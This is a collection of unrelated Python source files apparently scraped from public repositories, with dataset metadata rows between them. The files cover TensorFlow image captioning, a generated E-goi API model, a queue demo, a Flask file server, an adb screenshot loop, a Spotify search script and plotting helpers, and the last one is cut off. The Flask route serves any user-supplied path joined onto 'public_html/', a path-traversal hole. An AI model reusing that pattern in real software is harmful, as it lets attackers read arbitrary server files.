x_inp = tf.placeholder(tf.float32, shape=[1, size[0],size[1],num_channels], name='x_image')
y = tf.placeholder(tf.float32, [None, vocab_size], name = 'x_caption')
Wconv = tf.Variable(tf.truncated_normal([bridge_size, vocab_size], stddev=0.7))
bconv = tf.Variable(tf.zeros([1, vocab_size]))
Wi= tf.Variable(tf.truncated_normal([vocab_size, vocab_size], stddev=0.7))
Wf= tf.Variable(tf.truncated_normal([vocab_size, vocab_size], stddev=0.7))
Wo= tf.Variable(tf.truncated_normal([vocab_size, vocab_size], stddev=0.7))
b = tf.Variable(tf.zeros([1, vocab_size]))
layer_conv1 = conv_layer(inp=x_inp, kernel_shape=(3, 3), num_kernels=32, num_channels=3, suffix='1')
layer_conv2 = conv_layer(inp=layer_conv1, kernel_shape=(3, 3), num_kernels=32, num_channels=32, suffix='2')
maxpool1 = tf.nn.max_pool(layer_conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2,1], padding= 'SAME')
layer_conv3 = conv_layer(inp=maxpool1, kernel_shape=(3, 3), num_kernels=64, num_channels=32, suffix='3')
layer_conv4 = conv_layer(inp=layer_conv3, kernel_shape=(3, 3), num_kernels=64, num_channels=64, suffix='4')
maxpool2 = tf.nn.max_pool(layer_conv4, ksize=[1, 2, 2, 1], strides=[1, 2, 2,1], padding= 'SAME')
layer_conv5 = conv_layer(inp=maxpool2, kernel_shape=(3, 3), num_kernels=128, num_channels=64, suffix='5')
layer_conv6 = conv_layer(inp=layer_conv5, kernel_shape=(3, 3), num_kernels=128, num_channels=128, suffix='6')
maxpool3 = tf.nn.max_pool(layer_conv6, ksize=[1, 2, 2, 1], strides=[1, 2, 2,1], padding= 'SAME')
layer_conv7 = conv_layer(inp=maxpool3, kernel_shape=(3, 3), num_kernels=256, num_channels=128, suffix='7')
layer_conv8 = conv_layer(inp=layer_conv7, kernel_shape=(3, 3), num_kernels=256, num_channels=256, suffix='8')
flat_layer = flatten_layer(layer_conv8, suffix='9')
dense_layer_1 = dense_layer(inp=flat_layer, num_inputs=262144 , num_outputs=bridge_size, suffix='10')
start_hook = tf.cast(csr_matrix(([1], ([0], [fwd_dict[start_tag]])), shape=(1, vocab_size)).A, tf.float32)
end_hook = tf.cast(csr_matrix(([1], ([0], [fwd_dict[end_tag]])), shape=(1, vocab_size)).A, tf.float32)
hook = tf.slice(x_caption, [0, 0], [1, vocab_size])
h = dense_layer_1
h, out = rnn_cell(Wi ,Wo, Wconv, bconv, h, hook)
def fn(prev, curr):
h = prev[0]
curr = tf.reshape(curr, [1, vocab_size])
h, out = rnn_cell(Wi ,Wo, Wf, b, h, curr)
return h, out
_, output = tf.scan(fn, x_caption[1:], initializer=(h, out))
output = tf.squeeze(output, axis = 1)
outputs = tf.concat([out, output], axis = 0)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=outputs, labels=y))
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
pred = tf.nn.softmax(outputs)
#%%
correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
out_tensor = tf.TensorArray(dtype=tf.float32, dynamic_size=True, size = 0)
htest = dense_layer_1
htest, out_first = rnn_cell(Wi ,Wo, Wconv, bconv, htest, start_hook)
t = 0
out_ = tf.one_hot(tf.argmax(tf.nn.softmax(out_first), 1), depth=vocab_size)
out_tensor = out_tensor.write(t, out_)
t += 1
def condition(res, h, out_tensor, t):
return tf.logical_and(tf.logical_not(tf.equal(tf.argmax(res, 1)[0], fwd_dict[end_tag])), tf.less(t, max_sent_limit))
def action(res, h, out_tensor, t):
h, out = rnn_cell(Wi ,Wo, Wf, b, h, res)
res = tf.one_hot(tf.argmax(tf.nn.softmax(out), 1), depth=vocab_size)
out_tensor = out_tensor.write(t, res)
return res, h, out_tensor, t + 1
_, __, final_outputs, T = tf.while_loop(condition, action, [out_, htest, out_tensor, t])
final_prediction = tf.squeeze(final_outputs.stack())
saver = tf.train.Saver()
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
m = len(train_caption)
for epoch in range(training_iters):
total_cost = 0
total_acc = 0
for i in range(m):
_, cst, acc = sess.run([optimizer, cost, accuracy], feed_dict = {x_caption:train_caption[i][:-1].A, x_inp:train[i:i+1], y:train_caption[i][1:].A})
total_cost += cst
total_acc += acc
if (epoch + 1) % display_step == 0:
print('After ', (epoch + 1), 'iterations: Cost = ', total_cost / m, 'and Accuracy: ', total_acc * 100/ m , '%' )
print('Optimization finished!')
print("Let's check")
for tests in range(num_tests):
image_num = random.randint(0, sample_size - 1)
caption = sess.run(final_prediction, feed_dict = {x_inp:train[image_num:image_num + 1]})
print(caption.shape)
caption = np.argmax(caption[:-1], 1)
capt = ''
for i in caption:
capt += rev_dict[i] + ' '
print('Predicted Caption:->', capt)
orig_cap = np.argmax(train_caption[image_num:image_num + 1][0][1:-1].A, 1)
orignalcaption = ''
for i in orig_cap:
orignalcaption += rev_dict[i] + ' '
print('Orignal Caption:->', orignalcaption)
plt.imshow(real_images[image_num])
plt.title('Image')
plt.show()
|
[
"[email protected]"
] | |
cf26d52e9926a5a057a1fb70657bda084f53ef49
|
60b1f668808de2b82c2fcb62b07b45bb165219f2
|
/egoi-api/models/form.py
|
4e4d4d5517af495318cbbc38c7b97704ef21786d
|
[] |
no_license
|
andersonmiguel/Egoi
|
6d37bf7a3a7555e764f7a6e792b3ef1c68fe8e20
|
b5f59f9b33ea94e170f4e7e26c6a37a78d2874c2
|
refs/heads/master
| 2022-06-21T07:18:44.920786 | 2020-05-04T17:29:02 | 2020-05-04T17:29:02 | 261,250,618 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 13,120 |
py
|
# coding: utf-8
"""
APIv3 (Beta)
# Introduction Just a quick peek!!! This is our new version of API. Remember, it is not stable yet!!! But we invite you play with it and give us your feedback ;) # Getting Started E-goi can be integrated with many environments and programming languages via our REST API. We've created a developer focused portal to give your organization a clear and quick overview of how to integrate with E-goi. The developer portal focuses on scenarios for integration and flow of events. We recommend familiarizing yourself with all of the content in the developer portal, before start using our rest API. The E-goi APIv3 is served over HTTPS. To ensure data privacy, unencrypted HTTP is not supported. Request data is passed to the API by POSTing JSON objects to the API endpoints with the appropriate parameters. BaseURL = api.egoiapp.com # RESTful Services This API supports 5 HTTP methods: * <b>GET</b>: The HTTP GET method is used to **read** (or retrieve) a representation of a resource. * <b>POST</b>: The POST verb is most-often utilized to **create** new resources. * <b>PATCH</b>: PATCH is used for **modify** capabilities. The PATCH request only needs to contain the changes to the resource, not the complete resource * <b>PUT</b>: PUT is most-often utilized for **update** capabilities, PUT-ing to a known resource URI with the request body containing the newly-updated representation of the original resource. * <b>DELETE</b>: DELETE is pretty easy to understand. It is used to **delete** a resource identified by a URI. # Authentication We use a custom authentication method, you will need a apikey that you can find in your account settings. Below you will see a curl example to get your account information: #!/bin/bash curl -X GET 'https://api.egoiapp.com/my-account' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' Here you can see a curl Post example with authentication: #!/bin/bash curl -X POST 'http://api.egoiapp.com/tags' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' \\ -H 'Content-Type: application/json' \\ -d '{`name`:`Your custom tag`,`color`:`#FFFFFF`}' # SDK Get started quickly with E-goi with our integration tools. Our SDK is a modern open source library that makes it easy to integrate your application with E-goi services. * <b><a href='https://github.com/E-goi/sdk-java'>Java</a></b> * <b><a href='https://github.com/E-goi/sdk-php'>PHP</a></b> * <b><a href='https://github.com/E-goi/sdk-python'>Python</a></b> <security-definitions/> # noqa: E501
The version of the OpenAPI document: 3.0.0-beta
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from egoi-api.configuration import Configuration
class Form(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'form_id': 'int',
'internal_title': 'str',
'title': 'str',
'language': 'Language',
'list_id': 'int',
'default': 'bool',
'owner': 'int',
'status': 'str',
'created': 'datetime',
'updated': 'datetime'
}
attribute_map = {
'form_id': 'form_id',
'internal_title': 'internal_title',
'title': 'title',
'language': 'language',
'list_id': 'list_id',
'default': 'default',
'owner': 'owner',
'status': 'status',
'created': 'created',
'updated': 'updated'
}
def __init__(self, form_id=None, internal_title='$request.body#/title', title=None, language=None, list_id=None, default=None, owner=None, status=None, created=None, updated=None, local_vars_configuration=None): # noqa: E501
"""Form - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._form_id = None
self._internal_title = None
self._title = None
self._language = None
self._list_id = None
self._default = None
self._owner = None
self._status = None
self._created = None
self._updated = None
self.discriminator = None
if form_id is not None:
self.form_id = form_id
if internal_title is not None:
self.internal_title = internal_title
self.title = title
if language is not None:
self.language = language
if list_id is not None:
self.list_id = list_id
if default is not None:
self.default = default
if owner is not None:
self.owner = owner
if status is not None:
self.status = status
if created is not None:
self.created = created
if updated is not None:
self.updated = updated
@property
def form_id(self):
"""Gets the form_id of this Form. # noqa: E501
:return: The form_id of this Form. # noqa: E501
:rtype: int
"""
return self._form_id
@form_id.setter
def form_id(self, form_id):
"""Sets the form_id of this Form.
:param form_id: The form_id of this Form. # noqa: E501
:type: int
"""
if (self.local_vars_configuration.client_side_validation and
form_id is not None and form_id < 1): # noqa: E501
raise ValueError("Invalid value for `form_id`, must be a value greater than or equal to `1`") # noqa: E501
self._form_id = form_id
@property
def internal_title(self):
"""Gets the internal_title of this Form. # noqa: E501
Internal title of the form # noqa: E501
:return: The internal_title of this Form. # noqa: E501
:rtype: str
"""
return self._internal_title
@internal_title.setter
def internal_title(self, internal_title):
"""Sets the internal_title of this Form.
Internal title of the form # noqa: E501
:param internal_title: The internal_title of this Form. # noqa: E501
:type: str
"""
self._internal_title = internal_title
@property
def title(self):
"""Gets the title of this Form. # noqa: E501
Title of the form # noqa: E501
:return: The title of this Form. # noqa: E501
:rtype: str
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this Form.
Title of the form # noqa: E501
:param title: The title of this Form. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and title is None: # noqa: E501
raise ValueError("Invalid value for `title`, must not be `None`") # noqa: E501
self._title = title
@property
def language(self):
"""Gets the language of this Form. # noqa: E501
:return: The language of this Form. # noqa: E501
:rtype: Language
"""
return self._language
@language.setter
def language(self, language):
"""Sets the language of this Form.
:param language: The language of this Form. # noqa: E501
:type: Language
"""
self._language = language
@property
def list_id(self):
"""Gets the list_id of this Form. # noqa: E501
:return: The list_id of this Form. # noqa: E501
:rtype: int
"""
return self._list_id
@list_id.setter
def list_id(self, list_id):
"""Sets the list_id of this Form.
:param list_id: The list_id of this Form. # noqa: E501
:type: int
"""
if (self.local_vars_configuration.client_side_validation and
list_id is not None and list_id < 1): # noqa: E501
raise ValueError("Invalid value for `list_id`, must be a value greater than or equal to `1`") # noqa: E501
self._list_id = list_id
@property
def default(self):
"""Gets the default of this Form. # noqa: E501
True if this is the default form in the list, false otherwise # noqa: E501
:return: The default of this Form. # noqa: E501
:rtype: bool
"""
return self._default
@default.setter
def default(self, default):
"""Sets the default of this Form.
True if this is the default form in the list, false otherwise # noqa: E501
:param default: The default of this Form. # noqa: E501
:type: bool
"""
self._default = default
@property
def owner(self):
"""Gets the owner of this Form. # noqa: E501
:return: The owner of this Form. # noqa: E501
:rtype: int
"""
return self._owner
@owner.setter
def owner(self, owner):
"""Sets the owner of this Form.
:param owner: The owner of this Form. # noqa: E501
:type: int
"""
if (self.local_vars_configuration.client_side_validation and
owner is not None and owner < 1): # noqa: E501
raise ValueError("Invalid value for `owner`, must be a value greater than or equal to `1`") # noqa: E501
self._owner = owner
@property
def status(self):
"""Gets the status of this Form. # noqa: E501
Status of the form # noqa: E501
:return: The status of this Form. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Form.
Status of the form # noqa: E501
:param status: The status of this Form. # noqa: E501
:type: str
"""
allowed_values = ["active", "unpublished", "cloned", "deleted"] # noqa: E501
if self.local_vars_configuration.client_side_validation and status not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
@property
def created(self):
"""Gets the created of this Form. # noqa: E501
The date and time # noqa: E501
:return: The created of this Form. # noqa: E501
:rtype: datetime
"""
return self._created
@created.setter
def created(self, created):
"""Sets the created of this Form.
The date and time # noqa: E501
:param created: The created of this Form. # noqa: E501
:type: datetime
"""
self._created = created
@property
def updated(self):
"""Gets the updated of this Form. # noqa: E501
The date and time # noqa: E501
:return: The updated of this Form. # noqa: E501
:rtype: datetime
"""
return self._updated
@updated.setter
def updated(self, updated):
"""Sets the updated of this Form.
The date and time # noqa: E501
:param updated: The updated of this Form. # noqa: E501
:type: datetime
"""
self._updated = updated
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Form):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Form):
return True
return self.to_dict() != other.to_dict()
|
[
"[email protected]"
] | |
d022c401cac71d8aef3ec744f424139b4bfc884d
|
88ca4006c4d624320002c3f939f27e2ba3a59a5a
|
/ch6_queue.py
|
53936cf17d2c92ec70739941c09ef32b7b45e402
|
[] |
no_license
|
sunice/PythonPractice
|
28dcf2bb5666f19e538c31783063f65b830ba7c3
|
64a4feb354fd84f64e193a8c5e62364fb50541bc
|
refs/heads/master
| 2016-09-06T12:50:51.491985 | 2015-05-25T00:49:51 | 2015-05-25T00:49:51 | 35,148,274 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 712 |
py
|
queue = []
def enQ():
queue.append(raw_input(' Enter New string: ').strip())
def deQ():
if len(queue) == 0:
print 'Cannot pop from an empty queue!'
else:
print 'Removed [', `queue.pop(0)`, ']'
def viewQ():
print queue
CMDs = {'e': enQ, 'd': deQ, 'v': viewQ}
def showmenu():
pr = """
(E)nqueue
(D)equeue
(V)iew
(Q)uit
Enter choice: """
while True:
while True:
try:
choice = raw_input(pr).strip()[0].lower()
except (EOFError, KeyboardInterrupt, IndexError):
choice = 'q'
print '\nYou picked: [%s]' % choice
if choice not in 'devq':
print 'Invalid option, try again'
else:
break
if choice == 'q':
break
CMDs[choice]()
if __name__ == '__main__':
showmenu()
|
[
"[email protected]"
] | |
85596fb3ff870c316d4d7b3553f515d5d673f9b9
|
2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8
|
/pardus/tags/2007/desktop/kde/autostart/actions.py
|
5bd7b2827ebfb6bdfc4093743e2fb7ed2daacc96
|
[] |
no_license
|
aligulle1/kuller
|
bda0d59ce8400aa3c7ba9c7e19589f27313492f7
|
7f98de19be27d7a517fe19a37c814748f7e18ba6
|
refs/heads/master
| 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 286 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
from pisi.actionsapi import kde
def setup():
kde.configure()
def build():
kde.make()
def install():
kde.install()
|
[
"[email protected]"
] | |
05b6c7a41ca37a887e8c167923f6e78cb61e66c6
|
0f9772eef40e6a995514438020bfe245b0634d23
|
/UnicornsApp/app.py
|
f55610ece2f5f38113de2cbbcf76253188d21c2f
|
[] |
no_license
|
koalaboy808/Crunchbase_InfoViz
|
4edeedd1236fcd0c0e6558cceb5d4dda75ef7c1d
|
d184190a45dfeff2c92223549e0d74fb076eef19
|
refs/heads/master
| 2021-01-01T05:02:11.590233 | 2016-05-06T12:29:58 | 2016-05-06T12:29:58 | 56,036,487 | 3 | 0 | null | 2016-04-22T22:33:15 | 2016-04-12T06:17:33 |
HTML
|
UTF-8
|
Python
| false | false | 398 |
py
|
from flask import Flask
app = Flask(__name__, static_folder="public_html/static")
@app.route('/')
def load_root():
f = open('public_html/index.html', 'r')
raw_data = f.read()
return raw_data
@app.route('/<path:name>')
def load_file(name=None):
url = 'public_html/' + name
f = open(url, 'r')
raw_data = f.read()
return raw_data
if __name__ == "__main__":
app.run()
|
[
"[email protected]"
] | |
9446b56384f1741e397ae19977d5a6629a625280
|
8d51d35013a4081af42a5d2388c4df960b01ead5
|
/adb_screen.py
|
69fe5f88c496d65de655502e369e1f931f7fc076
|
[] |
no_license
|
1998Don/ledi_git
|
9eae06c6a1c36736f74a56499f52266fd125ea4d
|
b05487361a5536593c842d2587adf0787e7390b1
|
refs/heads/master
| 2023-05-18T03:45:41.772941 | 2021-06-11T04:19:00 | 2021-06-11T04:19:00 | 353,873,956 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 530 |
py
|
import os
import time
class ScreenRobot:
def screen(self,count):
# 截屏
os.system(f"adb shell screencap -p /sdcard/{count}.png")
if __name__ == '__main__':
count = 1
robot = ScreenRobot()
while True:
try:
robot.screen(count)
os.system(f"adb pull -a /sdcard/{count}.png")
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), f'picture{count}.png')
time.sleep(0.5)
count += 1
except:
break
|
[
"[email protected]"
] | |
4bc54103403acae606e53e6f343613459226f1bf
|
e0709b5108445182a64a64acd1fc0523c903aeea
|
/app/urls.py
|
c89c2f3f558822e0ec6f837c824a2b2e3daf3a94
|
[] |
no_license
|
SusanaPavez/ninja-gold
|
1c26fa40aeabf0d45580f02c72861a55d3e7726a
|
2f02eab0acefa5acb6da2653bc8c57eaf2770b95
|
refs/heads/master
| 2023-07-09T20:25:05.218740 | 2021-08-10T00:50:36 | 2021-08-10T00:50:36 | 394,426,269 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 162 |
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index),
path('juegos/' , views.juego),
path('reset/', views.reset),
]
|
[
"[email protected]"
] | |
9d7a71d485c1957b6370b2641222562691b42037
|
3f40cd227393a1e9c1e76d7da3c9aaefe0581279
|
/venv/main.py
|
35680094676b7cbe1011d7743b8c5b27172918f8
|
[] |
no_license
|
ponikka/Cardano
|
5df4075a98abc1f3360bc9ce2b06b3f072b41f74
|
01c0c47d99a4649f2ab23321f8be78e0f16b900f
|
refs/heads/master
| 2021-02-09T11:47:36.879496 | 2020-03-02T08:16:12 | 2020-03-02T08:16:12 | 244,184,774 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,273 |
py
|
from tabulate import tabulate
from random import choice
from string import ascii_uppercase
from math import sqrt, ceil
alphabet = list(ascii_uppercase)
word = input('Enter the phrase\n').upper()
side = ceil(sqrt(len(word)))
if side % 2 != 0:
side = side + 1
square = []
square = [[0] * side for i in range(side)]
for i in range(side): # create the chiper key
for j in range(side // 2):
square[i][j] = 1
print('The KEY:')
print(tabulate(square, tablefmt='grid'))
count = 0
for i in range(side // 2):
for j in range(side):
if square[i][j] == 1 and len(word) > count:
square[i][j] = word[count]
square[i][side - j - 1] = word[count + (side//2)*(side//2)]
count = count + 1
count = count + count
for i in range(side // 2, side):
for j in range(side):
if square[i][j] == 1 and len(word) > count:
square[i][j] = word[count]
if len(word) > count + side:
square[i][side - j - 1] = word[count + (side//2)*(side//2)]
count = count + 1
print("Final table:")
for i in range(side):
for j in range(side):
if square[i][j] == 1 or square[i][j] == 0:
square[i][j] = choice(alphabet)
print(tabulate(square, tablefmt='grid'))
|
[
"[email protected]"
] | |
9070f9ba6596fb792ae2d17601a5a9c0581820c3
|
fd8405ac0a5d062907c153f2f2e3569571366539
|
/irbisbooks/core/urls.py
|
17e44ae4a60722f69bb0d5da5d79b7b2b8dec070
|
[] |
no_license
|
ri-gilfanov/irbis-books
|
aab471833035ae51088bccfb0806b863aaba3468
|
0b2a32013ab7f0c0d167e0864a7cb858e8e75add
|
refs/heads/master
| 2021-01-25T13:19:07.818513 | 2018-03-02T09:47:06 | 2018-03-02T09:47:06 | 121,642,933 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 191 |
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.book_search, name='book_search'),
path('book_download/', views.book_download, name='book_download'),
]
|
[
"[email protected]"
] | |
d4ed49c5ad66c87e5989c74f78149de700205878
|
d104df89c9eeb210a10d45fb11b80bad6e53b30a
|
/150520/new_uri.py
|
39306da7bacddbbb8aacf3c6b09387a758ca5892
|
[] |
no_license
|
tbc31cc/Python-scripts
|
119c54014c1379627237463a65c2b55bf7b5d4ca
|
1e38fe3359401b5a150eed191bbcf39dbafc3e1f
|
refs/heads/master
| 2021-01-10T21:55:25.479996 | 2015-05-20T21:48:47 | 2015-05-20T21:48:47 | 35,639,821 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,617 |
py
|
# Sometimes Spotify stores multiple entries for an album or track, or you may accidentally add an album/track that isn't available in your country
# If you choose a bad URI with the original search, use this to load a new entry that hopefully works
# Now filters out results that are not available in specified country (US) (new method)
# Program now asks user to re-enter searchtype in the case of an invalid entry
# User can choose to open entire list of results as a text file
# Use with command line ""C:\Python27\Lib\new_uri.py" "$ascii(%artist%)" "$ascii(%album%)" "$ascii(%title%)""
import sys
import spotipy #third-party module
import pyperclip #third-party module
import string
spotify = spotipy.Spotify()
display = "URI(s) copied to clipboard. Press enter to exit"
# Specified country
country = u'US'
# args = [path, artist, album, track], taken from command line
if len(sys.argv) > 1:
artist_name = sys.argv[1]
else:
artist_name = str(raw_input('Enter artist name: '))
# Choose advanced search type (track or album)
valid_types = ['track','album']
def get_valid_type():
i = str(raw_input("Please type track or album: "))
if i in valid_types:
return i
else:
return None
while True:
searchtype = get_valid_type()
if searchtype:
break
if searchtype == 'album':
if len(sys.argv) > 2:
item = sys.argv[2]
else:
item = str(raw_input('Enter album title: '))
elif searchtype == 'track':
if len(sys.argv) > 3:
item = sys.argv[3]
else:
item = str(raw_input('Enter track title: '))
print 'Finding URI for ' + searchtype +': ' + '"'+item+'"' + ' by ' + artist_name
# Generate search results
results = spotify.search(q="artist:"+artist_name+' '+searchtype+':'+item, type = searchtype, limit = 20)
items = results[searchtype+'s']['items']
# Filter out results not available in specified country
for i, t in enumerate(items):
if country not in items[i]['available_markets']:
items[i] = []
while [] in items:
items.remove([])
# Shorten long strings
def shorten(string):
if len(string) > 80:
return string[0:80]+'...'
else:
return string
# Function for generating list of results
def print_info(i,t):
name = filter(lambda x: x in string.printable, t['name'])
album_type = ''
artist = ''
album = ''
release_date = ''
if searchtype == 'album':
get_artist = spotify.album(t['id'])
artist_name = get_artist['artists'][0]['name']
release_date = ' ('+get_artist['release_date'][0:4]+') '
artist = filter(lambda x: x in string.printable, ' '+artist_name)
if items[i]['album_type'] != 'album':
album_type = ' - '+t['album_type']
line1 = ' '+str(i)+' '+name+album_type+release_date
elif searchtype == 'track':
artist = filter(lambda x: x in string.printable, ' '+t['artists'][0]['name']+'\n')
album = filter(lambda x: x in string.printable, ' from '+'"'+t['album']['name'])
line1 = shorten(' '+str(i)+' '+name+album)+'"'
else:
line1 = ' '+str(i)+' '+name
line2 = '\n'+artist
line3 = '\n '+t['uri']+'\n'
return line1+line2+line3
# If there are multiple results, let user choose which URI to copy to clipboard.
# Searches with one result automatically copies URI.
print '\nResults:\n'
if len(items) > 0:
for i, t in enumerate(items):
print print_info(i,t)
if len(items) == 1:
n = 0
else:
n = int(input("Choose from provided list. Enter -1 to choose all items "))
# Copy final result to clipboard/Open full list as text file
if n == -1:
text = ''
for i, t in enumerate(items):
text = text + '\n' + print_info(i,t)
import subprocess as sp
programName = 'notepad.exe'
with open('output.txt', 'w') as text_file:
text_file.write(text)
sp.Popen([programName,'output.txt'])
else:
text = items[n]['uri']
pyperclip.copy(text)
else:
print 'No results found\n'
text = 'No results found'
display = 'Press enter to exit'
raw_input(display)
|
[
"[email protected]"
] | |
60ce8d44e75ecb0dd3ee8a66f4522c00b97994c7
|
e7613f9e21d558cdb304f7268fdec433bbbbf08f
|
/Ohloh.py
|
d91bcdbab7382ccb1b354e773d337075b4dad563
|
[] |
no_license
|
mdavid/web
|
0ea1b67ce2c6006d10c79638f345b344b1aeb129
|
53fd4ca7e2c0053f27bca9384f6b3cc142a17122
|
refs/heads/master
| 2020-12-25T16:35:34.746167 | 2011-11-21T23:08:02 | 2011-11-21T23:08:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,746 |
py
|
# -*- Mode: python; coding: utf-8 -*-
#
# Cherokee Web Site
#
# Authors:
# Alvaro Lopez Ortega <[email protected]>
#
# Copyright (C) 2001-2011 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
LANGUAGES_HTML = '<script type="text/javascript" src="http://www.ohloh.net/p/3906/widgets/project_languages.js"></script>'
COCOMO_HTML = '<script type="text/javascript" src="http://www.ohloh.net/p/3906/widgets/project_cocomo.js"></script>'
COCOMO_FIX_JS = """
/* Come on! $55k? Seriously? It must be a typo.. */
$('.ohloh-cocomo-box input:text').filter(function() { return $(this).val() == "55000"; }).each(function() {
$(this).val (90000);
$(this).trigger ('change');
});
"""
class Languages (CTK.Box):
def __init__ (self):
CTK.Box.__init__ (self, {'class': 'ohloh-languages-box'})
self += CTK.RawHTML (LANGUAGES_HTML)
self += CTK.RawHTML (js = COCOMO_FIX_JS)
class Cocomo (CTK.Box):
def __init__ (self):
CTK.Box.__init__ (self, {'class': 'ohloh-cocomo-box'})
self += CTK.RawHTML (COCOMO_HTML)
self += CTK.RawHTML (js = COCOMO_FIX_JS)
|
[
"[email protected]"
] | |
331e2392e43bde4b749c5989c07d18264418908c
|
5a3264c41ded21d24d03bc38063468b45505e0e2
|
/venv/lib/python3.6/keyword.py
|
0538dd34072883fdef176cce0915897d0f4ca804
|
[] |
no_license
|
vjs3/playing-with-flask
|
e4635912550ef5317eac99c507fc43c860ccd4fc
|
d2ef8f80a0501752e4a249543c883877cba35f0d
|
refs/heads/master
| 2020-03-23T10:21:05.605400 | 2018-07-18T12:41:07 | 2018-07-18T12:41:07 | 141,438,422 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 47 |
py
|
/Users/vjs3/miniconda3/lib/python3.6/keyword.py
|
[
"[email protected]"
] | |
f37f65c77fc2cbe630313fe9779572d9243628eb
|
96aa2367affe0dff353e1aaac8713ded087c5f68
|
/utils/spiderPlot_SA.py
|
335ed09082b623795670281ed3731ae77c81e7d3
|
[
"Apache-2.0"
] |
permissive
|
NMTHydro/Recharge
|
0fcca9a72b631d6c3834c62b84dfb096da6cb210
|
bbc1a05add92064acffeffb19f04e370b99a7918
|
refs/heads/develop
| 2020-05-21T17:39:37.702622 | 2020-04-08T17:10:40 | 2020-04-08T17:10:40 | 60,631,952 | 8 | 1 | null | 2016-10-26T17:01:21 | 2016-06-07T17:13:30 |
Python
|
UTF-8
|
Python
| false | false | 5,333 |
py
|
# ===============================================================================
# Copyright 2016 dgketchum
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance
# with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =================================IMPORTS=======================================
import os
import matplotlib.pyplot as plt
from matplotlib import rc
from numpy import linspace, array, add, multiply, set_printoptions
from pandas import read_pickle, set_option, options
def round_to_value(number, roundto):
return round(number / roundto) * roundto
rc('mathtext', default='regular')
set_option('display.max_rows', None)
set_option('display.max_columns', None)
set_option('display.width', None)
set_option('display.precision', 3)
options.display.float_format = '${:,.2f}'.format
set_printoptions(threshold=3000, edgeitems=5000, precision=3)
set_option('display.height', None)
set_option('display.max_rows', None)
TEMPS = range(-5, 6)
ALL_PCT = [x * 0.1 for x in range(5, 16)]
ndvi_range = linspace(0.9, 1.7, 11)
NDVI_RANGE = array([round_to_value(x, 0.05) for x in ndvi_range])
def make_spider_plot(dataframe, ndvi, all_pct, temps, fig_path=None, show=False):
display_pct = [(int(x)) for x in add(multiply(all_pct, 100.0), -100)]
dfs = os.listdir(dataframe)
print 'pickled dfs: {}'.format(dfs)
filename = '_basic_sensitivity_2.pkl'
if filename in dfs:
